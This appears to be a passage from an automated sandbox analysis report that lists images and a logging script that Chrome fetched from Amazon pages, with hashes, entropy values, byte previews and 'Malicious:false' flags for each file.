                                                                                                                                                                                                                                                                      SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                      SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/01/msa/vowels/metrics._STID993431-1724264970962_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8843
                                                                                                                                                                                                                                                                      Entropy (8bit):7.893627741188661
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:lsBpfB8QwSuf/RFfOzb/rKraxvSiSDcOPRtmlcKPTMedd0P:EfzpURFS+r2vSiS4K0MedC
                                                                                                                                                                                                                                                                      MD5:32D41341A71CAC76617298A53B6BEC9E
                                                                                                                                                                                                                                                                      SHA1:A8F1B340F6875C0728CBEF5049BC91EE906BA765
                                                                                                                                                                                                                                                                      SHA-256:2FF4F9A2BB58175901AF1D6F2976A6EBE40D42ECF680964880A213805532FF32
                                                                                                                                                                                                                                                                      SHA-512:6A6D8436A234C348822BE43FF94267FC18ADF205662983421134CBE5B9F957435EA3D1A57AC286B39E7A8BFF27F6C6ADBD43A5D76FC3DD539A335EA5D878FD83
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................X............."....BZ..j$%....BZ..j$%.?a......~~)..^kf.}*.T.Y.tj#f;M...q...........Wa.O...F............O.].z.....~...M....j.}2\...uVK;k7.S....O..<....).F.I.QX]..sv.b......W.u....SF}!...p..j.-....=....P...4.v3..t.g..om2.<G.}.n.c6/BC....{.:..5.T..k....B.......52.|..6.{..Uv.+....Z.]....Mk(.&.Bz:.........7.>.n..p......../.o.p.s.wZ5)......E.-.?..d.|m.Y.-J..p...x.I..Wl......\.gU..n........uv..wSo.M....*}.^..Q.....b...q..mr..t]..]..........].k....I.3ZF._..."..............|Z.N=_O..I]t.2..w.=o.z$y.......|.l.|..&/.......e..g..Y~.7..c...|W.t!.L1...^m.].U.5..........8l.Fy........_..~.v..i......9c.....u%.W......_............~~..............................................!"01.#2.AQ. 3`$4B............`9.|w.....g{;....w.....g{;..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1x1, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):285
                                                                                                                                                                                                                                                                      Entropy (8bit):3.992477276923708
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6:7hHx7qC0o26Z+aW6Hri/aliltjDtqRXhP/lYYms9:7vTtRWPtsh/lz
                                                                                                                                                                                                                                                                      MD5:B1DF542B3846358E48A00920727A87EB
                                                                                                                                                                                                                                                                      SHA1:B3E8EE8554DA24238553747F8B2656739AD00FFD
                                                                                                                                                                                                                                                                      SHA-256:733E9DF98B6072B548E0D75DDAE41F62B4EB20996D3C06588B78D9963F57DB94
                                                                                                                                                                                                                                                                      SHA-512:3281B4C63BBADB693CC73281197675FCC8FBCB0671DE59C6F525C054C19EF274EC6738E872559FB077758406C7982E478C3B9F6D3C30A73DAF0E1716220C94F2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................................................................?...$..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):1599
                                                                                                                                                                                                                                                                      Entropy (8bit):7.544935724436636
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0r6v2bWPXa9bS7/RabWbFpD5g83FxL1WybbbR:TZv2bWfa2/MbWbFpD5FDUybbbR
                                                                                                                                                                                                                                                                      MD5:7E3BE9F05D717AA9B5B8EFF87A0DB2ED
                                                                                                                                                                                                                                                                      SHA1:FA4129AEAF2B91E5B9009176F318CE1A93F53BD7
                                                                                                                                                                                                                                                                      SHA-256:8B4A307A0EA37F59D262F1209CD84A84FCCD4613335A97D9BD7D232646C610A4
                                                                                                                                                                                                                                                                      SHA-512:A0DBA04BCFAB074F305FAC0F8F50C98919CD21B1BD7FCD1210D87BA4C3E42408F28BD003A5946D3246BD3C448FB5EAD2BC4FFB318E8E4040F6B4100DD32901DF
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........x......................................................!1Q.q.."ARab....#2BSc..$s...................................................?...D@DD.D@DD.UZ.j.f...N.!.i......o........fV.)W..e.F..v.,q..0B..p%.................j}..J...j....[..N.&....Vcf.-.a...{...Ihk.=.......a..../..7.......#.-.PqA..s.Q..3.jF.."dM..'...j..t.{3\.....+....................B.Q.r.L.............I..........p...F....4.@,...e.J.67r.]....;.v..)...Y..(f./.A....F....}.._6.....l^.5..;...(={7..0*RL4..y..a.E6V..!c".h.5.h..4...D@DD.D@DD.D@X.n...=...p.......`....X(...N.y.X.(:9..<...i.].._...:..b......78..:.}$.Z"..%X...v-.....C=..3..F....cX.0.V....2@...w...S.:.2...Lz.1.....@.H...............`.......].b..P...p&I.f0_...R...!.]..B....4..\yV+jc..lL....,.N.........X1..F.._+...u.-..B?.....R..9..o...+..<......K..............\...P.?..i..O
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x316, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):31959
                                                                                                                                                                                                                                                                      Entropy (8bit):7.985513061843069
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:mgrVM6UgK2SbPqFTHxG3rvpsnpUxNs1wx5:mgrC6NK2S+FTHYjiusI5
                                                                                                                                                                                                                                                                      MD5:0A51C0065E091C32D516744D89DA9A10
                                                                                                                                                                                                                                                                      SHA1:BD879736DEAACB0729439760D8E8EBDF441F369E
                                                                                                                                                                                                                                                                      SHA-256:DD0BF68774F61EE4CC6BCA978D871DD4791A33981D6319F9EEC56B5378D0EEE5
                                                                                                                                                                                                                                                                      SHA-512:2D60CF67657EB23A67110D4E74D417EE5F32212EB24FA2642C5F0964ABB9D9C2A5F0A104547EB2B41122D1AE7413B7C1081E0FFE62ED155B197BD1A4D2CF6BD3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......<.@.."..........6...................................................................i,..~t...4.te../..Xo~*..8SN U..\V..jJ..%..Y...(g.$hEB.F......^.q.....F..d.d.Uh.,.(FD.P.3sp.Y.D.<...f.5.....;CF.1g|..~..].........i.o.s.0&By....$.#.X...WW..o...._.2.R....5x.Ql.\.[.$.a.,.#..2t./.S.$.._.j.M.V_.......:..L.N..&|,$....f(.4..^.v.J2..dY...j..L..r.~.2.9..VL......Q..v.....$...z.O.;..Q......=..{O;.\...o.rc...R.ZN1.J...4..v...I,.7.......=...%...l3;...}r5.Bz....n9...dt..A.<.H......-W.tE....Ax....Y....<.PK..d.(.Q..h^])J@.cz.Igc;f....d..p....J...."......6.......{.Nb.....n@...1.......s..4?7S.....kE....<tv...S...'..M.u.==\.D."..e.....X.)o.n.p..n.=...3_....g.g..P<5.sc_TIR..U..#;&...u....h{.o.B..pt....V.]CoT.V<.~...)I...5.e1......+F8...6.....n5x..g...Z?...B,.Q.Jh.Ju..p....+..{..Ca.0qs......w>c>i;...I.F..e..8x1et...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):17554
                                                                                                                                                                                                                                                                      Entropy (8bit):7.96859081064523
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:4V3zgg9CgJd5rgcEBHXLqYTUNoc7H8KC9Ga8S:4V3z/dmhFRCoc7H8KNFS
                                                                                                                                                                                                                                                                      MD5:32C36A04CBB28204CBEE346ED2CC219F
                                                                                                                                                                                                                                                                      SHA1:28867CC3A3F536DF97718FB9849B7846453974E0
                                                                                                                                                                                                                                                                      SHA-256:2FA197EA721DFC52D40D3FF1F383127B45C9C76550F2C7B45B4E1E6CAD156104
                                                                                                                                                                                                                                                                      SHA-512:4AF75255C3583980BBA7C4E7B874C8B705A71FFAC277B3C8FAD192FB9571E3D68536D7518FDF3BFB17AB4961F66AAC31D5687F3B09D8FD6DC069C3E22EF0695B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................0.{.."..........9......................................................................A...=.....u..i.z?.~.y......^=.4.WX.b...$.c......|..F.'.<k..P%*.y.@.0.H..9%..+.i..}...lsb.I....P.2..@..TY*s..<.....;.....Zo.zw.o.........y.@../...00;'..n..|...xz.....@H.'k.....$....Y+.>.F........:.f.m.N.{T......P.....T.=%^....Uy......^9.:..o.......il.A..G.>..:.M.......G.....Q.....L."x..g%'..j..m...5>...<6..v...r:...G...{....r.%Nc..E.._R..w.S.s].}..]D.u.G.R.I..I..Ns\.."\W\.}.u4.u;..:G...#.R..-p....d.SN.:...`...k........F.X...+.......H.DR..).6...U....VuM.V.RX9XuL9XuMM@..:..@].KPp...DUN8.Z.._F...e..e...S......M.Mn..<..+..P4.........P.%.."..'.lK..H..]..9..3:.O;..J.T.x..\..M...M...8.m5.F..j.[q...Px.@.1...M. .'T..k......M..<v..5...I:..Yl..^......+......_..6.FVCKbu..(.]..*y.r..}5..;..V...#..R....D...?.F<V.G"..T.94.@
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (16775), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16775
                                                                                                                                                                                                                                                                      Entropy (8bit):5.4319461542356375
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:75e8vl7Dm2yfRRt2XHyfO7NGSulG8QKf1OqJA3oq3Ov07r:75e8v1DSoXpGmqJA3oq3Ov07r
                                                                                                                                                                                                                                                                      MD5:909387735CDFE104DDCB4552DB93B969
                                                                                                                                                                                                                                                                      SHA1:9E9B4D86B6122C3E2B8DE8B6A2075B165DBB7682
                                                                                                                                                                                                                                                                      SHA-256:DA1947B36F0D22AEE59588CBAC8F06A015218EE7DDF6706618BE10F2A1151211
                                                                                                                                                                                                                                                                      SHA-512:0905206335158C2E99E2ABA560725A0A34F7D72F287F82924C7892AFA6558065D24BE034DBFE1FA611D877E21D8B59115F2E33C2050079D468ECD1DB94A612D1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/41zL88vnT5L.js
                                                                                                                                                                                                                                                                      Preview:var LoggingClientManager;(()=>{"use strict";var e={834:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=t.VISUAL_COMPLETENESS_LATENCY=t.UNCAUGHT_ERROR=t.CREATIVE_LOAD_LATENCY=void 0;const n="uncaughtError";t.UNCAUGHT_ERROR=n;const i="creativeLoadLatency";t.CREATIVE_LOAD_LATENCY=i;const o="visualCompletenessLatency";t.VISUAL_COMPLETENESS_LATENCY=o,t.default=class{constructor(e){if(this.events={uncaughtError:{}},this.timers={},this.onNewError=()=>{},this.window=e&&e.window||"undefined"!=typeof window&&window,!this.window||!this.window.document)throw new Error("Window and/or document is not defined");this.trackLoadLatency(),this.trackVisualCompletenessLatency(),this.addErrorListener()}trackLoadLatency(){this.timers[i]=new Date}trackVisualCompletenessLatency(){this.timers[o]=new Date}addErrorListener(){const e=this.events[n];this.addListener(this.window,"error",(t=>{let n=t.message;if(t.error&&t.error.stack){const e=t.message+" : "+t.error.stack;n=e.length<500?e:e.substri
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 278x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):19602
                                                                                                                                                                                                                                                                      Entropy (8bit):7.976187228415165
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:JLS0vX386Qh9AIs1u1deCLZlQqNll+/aOZ7OUENX0QTvWw:VJX386e9AIscjZF0HUPv+w
                                                                                                                                                                                                                                                                      MD5:8E1DD4FB1213C6632084CA3365616E17
                                                                                                                                                                                                                                                                      SHA1:722A587C682579CBC453E95B7C92A5544C341DE8
                                                                                                                                                                                                                                                                      SHA-256:9F30387784BC20BB39D14731EEE5EADD325442055B93EE8DA707A67F0F88DB68
                                                                                                                                                                                                                                                                      SHA-512:B55F2074429490EE2139147FD81FB23C2D83141B050D248D77A1363233C4BEB616F216E0BEB1BC1CCCC2852FE0DCEFB100D1CCB26C9BE78BDB993CD6941B7F02
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71Rzh1WKGfL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................ZJD..$.I).JD.3.>...c.....`Q*oD/4...H......7.....'......%nom.iFX..f.NW......"..x....j....+..S..(.i..v.........dN.g6T.e=...w...q.].K>...6......=&.3h.[?S...Y. .GEG...4....n8!z,.I).-.[>|...%`.../.7..D-.....%...^I`aM@..$.8...=...Q..v.]F.........;x9.2....|4.....M!.~....z.t..E.V........+."C.B.j].. V.....U...."_.....OR..,.7{^S.v.A.e.KZ,l..W....{:....C...'.*...Cr}...o<.. Jk9...%.....Ae^.....mK..a..V.C....(..?.q..=*.....n..V'...~pYM2..98...T.v.0..z\p-.G>........g...q...z..e...`U...$9..0.+..<.%G.G."jU%.}...@Kn .....uql.h.xS.e..p....y]...}.y.m.>+[n..-K....wA..\..K....;..n......;<#-.kv..............$7..r.^..qSZ....K>q.......x.!fa.R.....[&...o......9...Q:r....._1.D.Z..z.j~...&.N..~Q[+.E...........hP.......|..6[....6..IG.....l.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2132
                                                                                                                                                                                                                                                                      Entropy (8bit):7.754854253062559
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rVLPMNn4fEYWfsmojwRTt04o5LW4PA+YmDNv55/uybbsA8:TEfqfwst04o444+YmDBK
                                                                                                                                                                                                                                                                      MD5:42E5B8A2E632B2CD6F4EF7B2163CAB99
                                                                                                                                                                                                                                                                      SHA1:95984EC0C369FD16EE0A6120AB8D1551060ADFEC
                                                                                                                                                                                                                                                                      SHA-256:D027D4A2602C1A135247F7864B96CC2FA6FC743AEEAD6119E6B85B7B46AFC93C
                                                                                                                                                                                                                                                                      SHA-512:8D8B1FC4682151497CD7AA02047D92B20DCB3370FA1B814F37C6AAD99B0024A82C5390B17912BCF527A575F0AF42D9A3B74734E53A0073645E13FF5A6279A4D8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1A..Qa."...#2q....$Rbt...............................................!1.A.."2............?...D@...DD.J*....L.u..1.o...W.X=Q./.(.......2..W?..E.h..+.*c...,N<....:u?f..fN.K..^...E.rpB" ...""...." .B.(.oW_[b.U...n...p...m._....L...VW.z....|..V...f.K%F@.H&'K..v#..f...r.b...ed1......#].6X...$.s.lE..<.O....8`$....2....K.5U......X..[..$5N.i.:..e..7+q.....=.U.k..B.=.q.dpc.9.-.<.+`....d.R.tp...DD....D@.......5....0\.e.%.E..Q].......J.|.l...w/....B_...}4.5.-......<<.Q..u.....#h.2Z...*.(ie....q'..B..eg..g~.~......_.M...c../..4r.ER..rT.I.G0?6.x..o...s.[.$.o.o..v...<LY..h../.u.tT.A..c.>..{>u...DE..DD....D@...!HE.U.i...$.m..9#...]..7..1....$.l1R<..%.{.a.mp......s.z.M]......Be{....0:.....zK{....,.....X.K..*|I.{,...c..>_8....5..4..)%....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 218x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):6754
                                                                                                                                                                                                                                                                      Entropy (8bit):7.921469423565778
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:ULpl0sHPjiUgpigRuCXUqSwplv2wEDULg:ULplwUgpzu78v+L
                                                                                                                                                                                                                                                                      MD5:CED3F14C157FA0F4076585E420E2718F
                                                                                                                                                                                                                                                                      SHA1:1EF7C300CB83F6B283E50A98EB70A8D8DB297B22
                                                                                                                                                                                                                                                                      SHA-256:537590B1017B7A833183DCD8DE516021123DC95E351423709632A7BBFF708E8D
                                                                                                                                                                                                                                                                      SHA-512:C453679CCAF79AA23B90CDC8417E51EE8D1915BA321D66FB1BD3B841DC8F638D7C7507DFDE1346388E3024EACF3A71DA58671DB8A51D9FF67C4E0EFA95C92DEC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61BpJ-+2UGL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1.."AQaq..#BR...2Sbr.....34D.......$Ccs.......................................................?..R..R..R..R..R..R....9......gKO..z-....kZ7..[.2..-".J......W..q_..V..(~...Q....:..Y/.{..].K;1y.o3.r~,k!q.......:B.'.y..4.Uk.5.....5.{..g.i..a....A...j.;..2_G"+.y....9_.Q....e.uno......+.4.Eu..................eh.Y.k.g0bT.C..|..?xdVN./O......d\...v.I..0A..U....@....\....32}VQ.}".u2.I6Y.F....g%...V...i.[-.....N..#... ...\P)JP)JP)JP)JP)JP)JP)JP)JP)J.;J..~..f..s...!......^.h#~.;c..nt.8.Q.O..C...D_.y........X..IiX.K..}..........J.M;..V........(...[YD...9.!....f.@.yF<R...1...{.Nn..6.Lg..<.<.*..@..^..H.....5.=./.1.O..P..^X....9?S.![.'.#{.c......?.....|.Bn.'...wxr.?.&....P6.n.lFU...}.J....X....$!$.r......6....S....zm.<..!......B(3.].2.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8865
                                                                                                                                                                                                                                                                      Entropy (8bit):7.881132938956866
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Y1cVEDjZAvmuIcq09pk4IYIhmJPjfr+UYN36:Y64jGeMpk4IYDJPjyUYd6
                                                                                                                                                                                                                                                                      MD5:B05B81750794CA693E9589C0A171634F
                                                                                                                                                                                                                                                                      SHA1:FA91375275E3E1C8FCD8F79BCAE5D85593A33C67
                                                                                                                                                                                                                                                                      SHA-256:FF24D4B094AB1896672F4C8D387150C74BBB2493F7D01BEA7C87247AA0AB3BB5
                                                                                                                                                                                                                                                                      SHA-512:0C1FBBBD92EAD677C12E4B8CC40239FF66D90A899180C0816A4827F982CB45DD259D24BBC08C34FF737BDE5D3BA3638FF99CA33F77D7C0D640B6970969D3B5EB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a@.@............................!..NETSCAPE2.0.....!..XMP DataXMPa1a8-9458-1177-8dcc-94086be1eca9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.!.......,....@.@....h..#.@*)..1..`.P.v.......p...e..}...7.Zm.[....O&$..#J...HN.4%=...F`H..n..4<+g+....F...I....u.ayn=>.u.K.dTw...Ln..w..u.1c.}...u.~.I...;G`..p....]........j..-....@j.My....R...$$....R.4.p.0..........G..p..!]}....0.vxq...]..(T..`...r.. ."...Z,c.@.....P..%.c.w..t..g`...Q..p.C..+M.."fK^.r..Q.M.6...S..FE..........*...Uo....J..>.v`..+W.:.,{....i.bl{...j..(.....w=...o1.p=H..vC.]...&....;.8f\.... .T.m.....$..\.....W;F..4h&.Y..3..*.so..-B..#...Z....uB.....KAd...`.w....|x.....?.||...O..9.w.Y..O..m......x..d.~.R.To.IvI..!.......,....@.@....x....H..8.3...TP[i2Q....g...8..[..-.....+...a.fDj............8....+.....&Ue.....a.e....`.n;t@z.f........jw.\.....v?\f...(z.z........k....H.........~@...G........v.....^...H.....N......e......a..........e.....e.......W......,Pp.A........:|..2,(..c.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):46156
                                                                                                                                                                                                                                                                      Entropy (8bit):7.981597165720794
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1V1p/dSQzwgTj3/PGu8isq7wpDJXLnpLqsvlxe3RTfcs/49FZEm0RDRsR8j:TLdSQsMD/OXCQJdLqstxIEs/49FZasI
                                                                                                                                                                                                                                                                      MD5:49570BA39E5ABEE6A2A867324CD2CD58
                                                                                                                                                                                                                                                                      SHA1:D241B206CEA1C07267D30910306FBAC9EADE556E
                                                                                                                                                                                                                                                                      SHA-256:6AAE129639AAAEA5A6DFF7E54EB13F58CAA50957D10A96F25606B7B87D3C1D69
                                                                                                                                                                                                                                                                      SHA-512:0ACCB90E038F1EF29E7FAD24A407A7AE610A14FD2E1AE06E7470321DF8233791FB0ADAD4074AFEFECC3E39B561BBF91062EE98700D9F1B64BD58806A929FF023
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Outdoors-Sleeping-bags-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................:N.B...u..wK;....a/....k.]R2........G....,Yu]A.NI..S....._...3.N..n..&x.a.M..^.r.n..L]....?.....h.B......0..w.sd...*.":y...U..mF5.~h%M.j#x..B.R.,.Q......{.?5AX5. ....).]f.....=2.....h...e.o.......dqw*di...cG..l*..AD....J..&(Ym^.`.+im.k.8F..v..Q.2a.........]..<r..'.8..1.......&.m..N.....rG...p.U..`..4.h.....C.....h..B4D.Z[...J..(@.gn.`....mmi.f.../..%E.......:A..KT...Y.ds._?v.vb[ aDd`W......!......k,8....?cF.....7).....yu.E.."BA..........7.[....:.B_LK.....f^.....$I..40.........Oj.`.....]."j.l..L&e;.....x..Tl/...J}-.@.v.N%ZpsA...N<.z...vj....u..<...e.5>..3..;..l.d.j..T....i...8....\^..-..2......=6...x%......q..8...e~uD...[j.F.Gl..i.d.2.*a...N#T...a8.i.q......}..&.IX.5..L........_..$....{.0..gAf{....]..l..~..@.k._~69..&.....y..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3315
                                                                                                                                                                                                                                                                      Entropy (8bit):7.868257366067716
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:TT0rmb11GraUKO+VJQrJnFYZAbQak+xsDcUsBuXGZhoytLFGZeidMb4X50SR7j3M:TVNnLJyQAEcdBBoytBGZEOj3ebcpN3U
                                                                                                                                                                                                                                                                      MD5:659FB2B8145F18D9D2F22EA8C9A27142
                                                                                                                                                                                                                                                                      SHA1:F8908689EEE5C4272A42B12178048E1CA77E9DD6
                                                                                                                                                                                                                                                                      SHA-256:ED06D5CBDAE45BD5B20E26F4BE60A0113B5DEA9BE7DF287A4A4BB48A8F5E9F01
                                                                                                                                                                                                                                                                      SHA-512:5D8A05A7E8F797D539D73A786E26CB8E676AFE6E4B594345BCCB8F3BAD621502B10AAD0FA931EA955A395EDCEBDEDA76286DC1028F710ED0FEF5BA571BE46FEE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.1.."AQaq.2R...#......B..b....................................................!1..Aa.qB..............?...R.*..(..(..(.....n.....o/.,......o..@.R(.*R.N..H.m<...A.UkI?...t.9.P.iQ...V.0Ap........n...Fo...[h...K.T...a...=.....4..V.ir...D.....1........*.)JP)JP)JP)JP)JP)JP+..X-.S..........-...U..y...O8.!l..r3Q2.C}O.~m..#..3.>K.7....89.Z......v..+8..h9.....B.e.!...g......MZ..........l..,.J..F7.b.W;r..u3..........(."....#u#....NF}..^4......Z+KrWh...(P...:..w{.8|C.7..B...'..!..9..=.MH.WRC.].l...B..I.C...+aI?......%m...."j.0.M...]../..Y.....B...+}B...H.0.A........x..+.|.....Z.$.q.........)J .)@.)@.+..k....R.gu... .....h...3..,..#.|\..0[..<I.f.._.....n2..Z..\...o...=.gf..#A.U.p.Zm=_...d.N;...5...Jh4._J.....<....a.>A>.y#..."..B._
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10733
                                                                                                                                                                                                                                                                      Entropy (8bit):7.885934182718208
                                                                                                                                                                                                                                                                      Encrypted:false
